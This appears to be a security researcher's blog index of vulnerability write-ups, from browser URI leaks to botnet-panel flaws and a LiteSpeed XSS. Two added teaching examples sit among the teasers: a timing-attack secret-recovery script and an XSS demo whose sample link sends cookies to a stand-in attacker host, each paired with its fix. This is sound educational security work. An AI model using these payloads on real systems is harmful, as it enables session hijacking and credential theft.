Hi, welcome to my blog. Here is some of the research I've done so far:

Protocol Handler/URI Vulnerability in Firefox, Chrome, and Edge

An important step in any targeted attack is reconnaissance. The more information an attacker can obtain about the victim, the greater the chances of successful exploitation and infiltration. Recently, I uncovered two information disclosure vulnerabilities affecting three of the major web browsers which can be leveraged to leak a vast range of installed…

Remote Code Execution in CCTV-DVR affecting over 70 different vendors

This post is a follow-up to research of mine dating back to December 2014, called "The Backoff POS Trojan operation". Back then, one of the key conclusions highlighted in the report was that fraudsters are adopting new tactics in order to attack retailers. This new attack vector is to compromise DVR boxes,…

Just Like Riding a Pony: Session brute force vulnerability

How the Pony Stealer Botnet's Weak Server-Side Security Enabled Exploitation
The Pony Stealer botnet, notorious for its ability to harvest credentials and sensitive data, had a flawed server-side authentication mechanism. This post delves into a vulnerability I discovered in Pony Stealer's authorization and authentication practices, highlighting implementation oversights, the role of session handling, and how…

Timing attack vulnerability in Zeus Malware Infrastructure

Timing attacks have been proven practical since 1996, as shown in a paper by Paul C. Kocher. In it, Kocher demonstrates how, by precisely measuring the time a private-key operation takes, one can completely recover the private key. The attack was shown to be effective against widely used cryptosystems such as Diffie-Hellman, RSA and…
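The principle Kocher describes, that data-dependent running time leaks the secret the operation depends on, is easiest to see in an early-exit string comparison of the kind found in web panel logins. The following is an added example, not code from this post or from the Zeus infrastructure it analyses. Wall-clock timing is noisy, so the leak is modelled deterministically: each comparison reports the number of byte positions it examined, which is exactly the quantity an attacker estimates by averaging many timing measurements. The secret token, alphabet and helper names are constructed for the demonstration.

```python
"""Timing side channel in an early-exit comparison, and its constant-time fix.

Added example (not from the original post). The "work" counter stands in for
elapsed time: an attacker averaging many requests sees the same signal.
"""
import hmac
import string

SECRET = b"Zf93kQ1p"                                   # constructed secret; attacker does not know it
ALPHABET = (string.ascii_letters + string.digits).encode()


def naive_compare(a: bytes, b: bytes) -> tuple[bool, int]:
    """Early-exit comparison. Returns (equal, work); work equals the length
    of the matching prefix plus one, so it leaks how much of the guess is right."""
    if len(a) != len(b):
        return False, 0
    work = 0
    for x, y in zip(a, b):
        work += 1
        if x != y:                      # early exit: this branch is the side channel
            return False, work
    return True, work


def constant_time_compare(a: bytes, b: bytes) -> tuple[bool, int]:
    """Fixed-work comparison: every byte is visited, differences are OR-ed
    together, and work depends only on the length of the inputs."""
    if len(a) != len(b):
        return False, 0
    diff, work = 0, 0
    for x, y in zip(a, b):
        work += 1
        diff |= x ^ y                   # no data-dependent branch
    return diff == 0, work


def recover_secret(oracle, length: int, alphabet: bytes = ALPHABET) -> bytes:
    """Attacker side: recover the secret one byte at a time. At each position
    the candidate whose comparison did the most work shares the longest prefix
    with the secret. The oracle returns (equal, work) like the functions above."""
    known = b""
    for pos in range(length):
        best, best_work = None, -1
        for c in alphabet:
            guess = known + bytes([c]) + b"\x00" * (length - pos - 1)
            equal, work = oracle(guess)
            if equal:                   # last byte: only equality distinguishes it
                return guess
            if work > best_work:
                best, best_work = c, work
        known += bytes([best])
    return known


def verify_token(provided: bytes) -> bool:
    """What the server should ship: the standard library's constant-time compare."""
    return hmac.compare_digest(provided, SECRET)


if __name__ == "__main__":
    leaky = lambda g: naive_compare(g, SECRET)
    fixed = lambda g: constant_time_compare(g, SECRET)
    print("against early-exit compare :", recover_secret(leaky, len(SECRET)))
    print("against constant-time compare:", recover_secret(fixed, len(SECRET)))
```

Against `naive_compare` the loop needs at most `len(ALPHABET) * len(SECRET)` queries to recover the whole token; against `constant_time_compare` every candidate reports the same work, so the attacker learns nothing and ends up with a string of the first alphabet character. On a real target the same structure applies, except that each "work" value is the mean of many timing samples taken to average out network jitter.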

A Walkthrough of the “APT” Intelligence Gathering Process

Every meticulous APT attack starts with comprehensive intelligence gathering, which includes getting to know the target before proceeding to more invasive actions. In this research paper I discuss the reconnaissance process performed on a potential target from the perspective of the adversary. This demonstration will show how much information can be harvested…

Backoff Point of Sale malware

On July 29, 2014, US-CERT (the United States Computer Emergency Readiness Team) issued an alert regarding a new point-of-sale malware it dubbed Backoff, the first public disclosure of this threat. The name was probably coined after a string found in the code of one of the versions of the variant that was analyzed by…

LiteSpeed Admin Panel XSS

A vulnerability I found quite some time ago in the LiteSpeed HTTP server, versions <= 4.1.11: a simple reflected XSS (cross-site scripting) in the administrator panel, which is a separate instance of the HTTP server listening on port 7080. If an attacker succeeds in convincing an administrator with an active session to open a maliciously crafted link…
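The attack pattern in the teaser, a crafted link whose query parameter is echoed unescaped into the admin panel's HTML, is shown below as an added example; it is not the LiteSpeed code nor the payload from the post, and the host, port 7080 path `/search` and parameter name `q` are assumptions for illustration. The vulnerable handler interpolates the parameter straight into markup, the hardened one escapes it for the two contexts it is placed in (element text and a double-quoted attribute).

```python
"""Reflected XSS: vulnerable versus escaped rendering of a query parameter.

Added example (not from the original post or from LiteSpeed). Both renderers
take the full URL the administrator was lured into opening and return the
HTML the panel would send back.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker links. Host, port, path and parameter are assumptions.
# First one injects a script element into the text context; second one
# breaks out of the value="" attribute instead.
LINK_SCRIPT = ('http://admin.example:7080/search'
               '?q=<script>fetch("//attacker.example/?c="%2Bdocument.cookie)</script>')
LINK_ATTR = ('http://admin.example:7080/search'
             '?q=" onfocus="alert(1)" autofocus="')


def query_param(url: str, name: str) -> str:
    """Return the first value of query parameter `name`, URL-decoded ('' if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the parameter verbatim into text and attribute contexts."""
    q = query_param(url, "q")
    return f'<p>Results for: {q}</p><input name="q" value="{q}">'


def render_hardened(url: str) -> str:
    """Same page, but the value is HTML-escaped with quote=True so that
    < > & " ' cannot terminate the text node or the quoted attribute."""
    q = html.escape(query_param(url, "q"), quote=True)
    return f'<p>Results for: {q}</p><input name="q" value="{q}">'


def reflects_unescaped(url: str, body: str) -> bool:
    """Simple check a tester can run: does the raw parameter appear in the
    response with its markup characters intact?"""
    q = query_param(url, "q")
    return q in body and any(ch in q for ch in '<>"')


if __name__ == "__main__":
    for link in (LINK_SCRIPT, LINK_ATTR):
        print("vulnerable:", render_vulnerable(link))
        print("hardened  :", render_hardened(link))
```

`html.escape(..., quote=True)` is sufficient only because the value lands in element text and inside a double-quoted attribute; a value placed inside a `<script>` block, a URL, or an unquoted attribute needs the encoding for that context instead. The `reflects_unescaped` check is the quick test behind a reflected-XSS finding: request the page with a marker containing `<`, `>` and `"` and look for it coming back unchanged.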

Desert Scroll Cypher

[RECOVERED FROM MY OLD BLOGS] Overview: Desert Scroll is an old project of mine which I wrote in Perl a couple of years ago; basically it is an implementation of a book cipher. Loading and mapping the key file: before every encryption or decryption of plaintext, a key is loaded into the memory of the script/program and then…